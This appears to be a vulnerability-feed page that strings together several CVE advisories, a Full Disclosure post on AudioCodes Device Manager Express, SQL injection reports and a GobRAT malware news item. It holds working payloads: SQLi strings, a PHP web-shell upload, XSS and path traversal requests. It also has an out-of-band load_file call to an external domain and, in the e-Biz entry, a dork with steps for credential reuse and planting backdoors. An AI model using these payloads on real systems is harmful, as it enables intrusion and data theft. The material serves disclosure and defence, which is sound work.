PrinterLogic build version 1.0.757 suffers from authentication bypass, cross site request forgery, cross site scripting, session fixation, insufficient checks, impersonation, remote SQL injection, and various other vulnerabilities.

PrinterLogic Build 1.0.757 XSS / SQL Injection / Authentication Bypass

Prestashop salesbooster <= 1.10.4 is vulnerable to Incorrect Access Control via modules/salesbooster/downloads/download.php.

In the module “Sales Booster” (salesbooster) from Webbax, a guest can download personnal informations without restriction.

**Summary**

*   **CVE ID**: CVE-2023-30196
*   **Published at**: 2023-05-22
*   **Platform**: PrestaShop
*   **Product**: salesbooster
*   **Impacted release**: <= 1.10.4 (1.10.5 fixed the vulnerability)
*   **Product author**: Webbax
*   **Weakness**: CWE-22
*   **Severity**: high (7.5)

**Description**

Due to predictible token and a lack of control in the path name’s construction, a guest can perform a path traversal to view all files on the information system.

Note : We are forced to tag it as a high gravity due to the CWE type 22 but be warned that on our ecosystem, it must be considered critical since it unlocks hundreds admin’s ajax script of modules due to this

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: none
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: none
*   **Availability**: none

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

**Possible malicious usage**

*   Stealing secrets to unlock admin controllers based on ajax script
*   Exfiltrate all modules with all versions to facilited pentesting
*   Stealing table\_prefix to greatly facilitate SQL injections for kiddies who don’t known how exploit DBMS design’s vulnerabilities or stealing database access to login in exposed PHPMyAdmin / Adminer / etc.
*   Bypass WAF / htaccess restrictions to read forbidden files (such as logs on predictible paths of banks’s modules inside /var/log/)

**Patch from 1.10.4**

    --- 1.10.4/modules/salesbooster/downloads/download.php
    +++ 1.10.5/modules/salesbooster/downloads/download.php
    ...
    -$file = Tools::getValue('file');
    +$file = basename(Tools::getValue('file')).'.txt';
    +if((strpos($file, './') === false) && substr($file,-4) == '.txt'){
    ...
    +}
    ...
    

**Other recommandations**

*   It’s recommended to upgrade to the latest version of the module **salesbooster**.
*   Update the configuration SALESBOOSTER\_TOKEN in your ps\_configuration table with a string not predictible - **be warned that the patch provided by author still suffer of a predictible security token mecanism.**
*   You should consider to restrict the access of modules/salesbooster/ to a whitelist
*   NEVER exposed a PHPMyAdmin / Adminer / etc without, at least, a htpasswd
*   Activate OWASP 930’s rules on your WAF (Web application firewall) and adjust it for your Prestashop

**Timeline**

Date

Action

2023-02-25

Issue discovered during a code review by TouchWeb.fr

2023-02-25

Contact Author

2023-02-25

Request a CVE ID

2023-02-27

Author confirm alert’s read

2023-04-24

Received CVE ID

2023-05-02

Author publish a new version which fix the leak

2023-05-22

Publish this security advisory

**Links**

*   Author download page
*   Usefull Author advices - French
*   National Vulnerability Database

CVE-2023-30196: [CVE-2023-30196] Improper Limitation of a Pathname to a Restricted Directory in Webbax module : Sales Booster for PrestaShop

The Elementor Website Builder WordPress plugin before 3.12.2 does not properly sanitize and escape the Replace URL parameter in the Tools module before using it in a SQL statement, leading to a SQL injection exploitable by users with the Administrator role.

CVE-2023-0329

The Fast & Effective Popups & Lead-Generation for WordPress plugin before 2.1.4 concatenates user input into an SQL query without escaping it first in the plugin's report API endpoint, which could allow administrators in multi-site configuration to leak sensitive information from the site's database.

CVE-2023-2111

An issue was discovered in AudioCodes Device Manager Express through 7.8.20002.47752. It is directory traversal during file download via the BrowseFiles.php view parameter.

**Full Disclosure mailing list archives**

_From_: Eric Flokstra <erp.flokstra () gmail com>  
_Date_: Fri, 17 Feb 2023 16:06:12 +0100  

\# Product Name: Device Manager Express
# Vendor Homepage: https://www.audiocodes.com
# Software Link:
https://www.audiocodes.com/solutions-products/products/management-products-solutions/device-manager
# Version: <= 7.8.20002.47752
# Tested on: Windows 10 / Server 2019
# Default credentials: admin/admin
# CVE-2022-24627, CVE-2022-24628, CVE-2022-24629, CVE-2022-24630,
CVE-2022-24631, CVE-2022-24632
# Exploit: https://github.com/00xEF/Audiocodes-Device-Manager-Express

AudioCodes' Device Manager Express features a user interface that enables
enterprise network administrators to set up, configure and update up to 500
400HD Series IP phones in globally distributed corporations.

----------------
CVE-2022-24627: An unauthenticated SQL injection exists in the p parameter
of the login form.
----------------
POST /admin/AudioCodes\_files/process\_login.php HTTP/1.1
Host: 10.11.12.13
".." omitted
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)
Content-Type: application/x-www-form-urlencoded

username=admin&password=&domain=&p=%5C%27or+1%3D1%23


----------------
CVE-2022-24628: An authenticated SQL injection exists in the id parameter
of IPPhoneFirmwareEdit.php
----------------
/admin/AudioCodes\_files/IPPhoneFirmwareEdit.php?action=download&id=-1338'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-


----------------
CVE-2022-24629: A remote code execution vulnerability exists via path
traversal in the dir parameter of the file upload functionality .
----------------
POST /admin/AudioCodes\_files/BrowseFiles.php?type= HTTP/1.1
Host: 10.11.12.13
".." omitted
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)

-----------------------------119140522224988540294045582807
Content-Disposition: form-data; name="dir"

C:/audiocodes/express/WebAdmin/admin/AudioCodes\_files/ajax/
-----------------------------119140522224988540294045582807
Content-Disposition: form-data; name="type"

-----------------------------119140522224988540294045582807
Content-Disposition: form-data; name="myfile"; filename="ajaxJabra.php"
Content-Type: application/x-php

<?php echo shell\_exec($\_GET\['x'\]); ?>


-----------------------------119140522224988540294045582807
Content-Disposition: form-data; name="Submit"

Upload
-----------------------------119140522224988540294045582807--


----------------
CVE-2022-24630: A remote command execution exists in an undocumented eval
function in BrowseFiles.php
----------------
POST /admin/AudioCodes\_files/BrowseFiles.php?cmd=ssh HTTP/1.1
Host: 10.11.12.13
".." omitted
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)

ssh\_command=dir+C:


----------------
CVE-2022-24631: A Persistent Cross-Site Scripting exists in the desc
parameter in ajaxTenants.php
----------------
POST /admin/AudioCodes\_files/ajax/ajaxTenants.php HTTP/1.1
Host: 10.11.12.13
".." omitted
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)

action=save&id=1&name=Default&desc=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(1)%3E&subnet=&isdefault=true


----------------
CVE-2022-24632: A path traversal vulnerability exists in the view parameter
of the file download functionality in BrowseFiles.php
----------------
/admin/AudioCodes\_files/BrowseFiles.php?view=C:/windows/win.ini
\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

**Current thread:**

*   **Multiple vulnerabilities in Audiocodes Device Manager Express** _Eric Flokstra (Feb 22)_

CVE-2022-24632: Multiple vulnerabilities in Audiocodes Device Manager Express

New MVC Shop version 1.0 suffers from remote SQL injection and missing attribute vulnerabilities.

    ## Title: new-mvc-shop-1.0 - SQLi + SameSite attribute weak securityPHPSESSID Hijacking## Author: nu11secur1ty## Date: 05.29.2023## Vendor: https://chikoiquan.tanhongit.com/## Software: https://github.com/tanhongit/new-mvc-shop/releases/tag/v1.0## Reference: https://portswigger.net/web-security/sql-injection## Description:The `User-Agent` HTTP header appears to be vulnerable to SQL injectionattacks. The payload '+(selectload_file('\\\\ttq1xmuilflmnv0pcl7cjdwb42avymmdp1koacz.pedal.com\\iqp'))+'was submitted in the User-Agent HTTP header. This payload injects aSQL sub-query that calls MySQL's load_file function with a UNC filepath that references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed. The attacker can retrieve all information from thedatabase of this system.---------------------------------------------------------------------------------------------------------------The following cookie was issued by the application and does not havethe secure flag set:PHPSESSID: The cookie appears to contain a session token, which mayincrease the risk associated with this issue.The malicious user can use one PHPSESSID to connect multiple times onthe system using the same account session.STATUS: HIGH Vulnerability[+]Payload:```mysql---Parameter: User-Agent (User-Agent)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8)Gecko/20050517 Firefox/1.0.4 (Debian package 1.0.4-2)' AND (SELECT2825 FROM (SELECT(SLEEP(15)))VKYP)-- kuoe---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/new-mvc-shop-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/05/new-mvc-shop-10-sqli-samesite-attribute.html)## Time spend:00:35:00

New MVC Shop 1.0 SQL Injection / Missing Attributes

Simple Customer Relationship Management CRM 2023 version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: SCRMS-2023-05-27-1.0-Multiple-SQLi## Author: nu11secur1ty## Date: 05.27.2023## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/15895/simple-customer-relationship-management-crm-system-using-php-free-source-coude.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The `email` parameter appears to be vulnerable to SQL injectionattacks. The test payloads 45141002' or 6429=6429-- and 37491017' or5206=5213-- were each submitted in the email parameter. These tworequests resulted in different responses, indicating that the input isbeing incorporated into a SQL query in an unsafe way. The attacker caneasily steal all users and their passwords for access to the system.Even if they are strongly encrypted this will get some time, but thisis not a problem for an attacker to decrypt if, if they are not enoughstrongly encrypted.STATUS: HIGH Vulnerability[+]Payload:```mysql---Parameter: email (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause    Payload: email=-1544' OR 2326=2326-- eglC&password=c5K!k0k!T7&login=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/SCRMS-2023-05-27-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/05/scrms-2023-05-27-10-multiple-sqli.html)## Time spend:01:00:00

Simple Customer Relationship Management CRM 2023 1.0 SQL Injection

It appears that sites designed by e-Biz Technocrats Pvt.Ltd suffer from a remote SQL injection vulnerability. As they do not provide any sort of versioning with their offerings, the researcher was unable to provide affected versions. Versions as of May 11, 2023 were affected.

    # Exploit Title: Sql Injection on one site credentials can be use on other sites- Google Dork:" Designed and Developed by e-Biz Technocrats Pvt.Ltd "- Date: 05/11/2023- Exploit Author: K1LL3rB4LL- Tested on: Mac, Windows, LinuxDescription:The vulnerability found is an SQL injection. You may run the site thru automated sql injection or manually doing sql injection once the credentials gathered you do your reverse ip to check your other website.Vuln colum count: 5Vuln colum : 3,4Type of Sql : WAFUsername: adminPassword: 123456admin panel: site.com/adminDetails: After gathering information from sql injection from site a site (site A) you may use the said credentials to access other websites on the same ip or with the same developer if you managed to get an access and upload a php script or backdoor. You may access other sites on their public_html or that is connected on their website which share the same server and if your going to look at the sites they share the same common developer. In some sites that don't have the same credentials you still do the same sql injection with the same colum count, vuln colum number and database where they store the admin credentials.

e-Biz Technocrats Pvt.Ltd SQL Injection

A vulnerability, which was classified as critical, has been found in SourceCodester Faculty Evaluation System 1.0. Affected by this issue is some unknown functionality of the file index.php?page=edit_user. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-230150 is the identifier assigned to this vulnerability.

CVE-2023-2962

Linux routers in Japan are the target of a new Golang remote access trojan (RAT) called GobRAT.
"Initially, the attacker targets a router whose WEBUI is open to the public, executes scripts possibly by using vulnerabilities, and finally infects the GobRAT," the JPCERT Coordination Center (JPCERT/CC) said in a report published today.
The compromise of an internet-exposed router is followed by the

Linux routers in Japan are the target of a new Golang remote access trojan (RAT) called **GobRAT**.

"Initially, the attacker targets a router whose WEBUI is open to the public, executes scripts possibly by using vulnerabilities, and finally infects the GobRAT," the JPCERT Coordination Center (JPCERT/CC) said in a report published today.

The compromise of an internet-exposed router is followed by the deployment of a loader script that acts as a conduit for delivering GobRAT, which, when launched, masquerades as the Apache daemon process (apached) to evade detection.

The loader is also equipped to disable firewalls, establish persistence using the cron job scheduler, and register an SSH public key in the .ssh/authorized\_keys file for remote access.

GobRAT, for its part, communicates with a remote server via the Transport Layer Security (TLS) protocol to receive as many as 22 different encrypted commands for execution.

Some of the major commands are as follows -

*   Obtain machine information
*   Execute reverse shell
*   Read/write files
*   Configure new command-and-control (C2) and protocol
*   Start SOCKS5 proxy
*   Execute file in /zone/frpc, and
*   Attempt to login to sshd, Telnet, Redis, MySQL, PostgreSQL services running on another machine

The findings come nearly three months after Lumen Black Lotus Labs revealed that business-grade routers have been victimized to spy on victims in Latin America, Europe, and North America using a malware called HiatusRAT.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#sql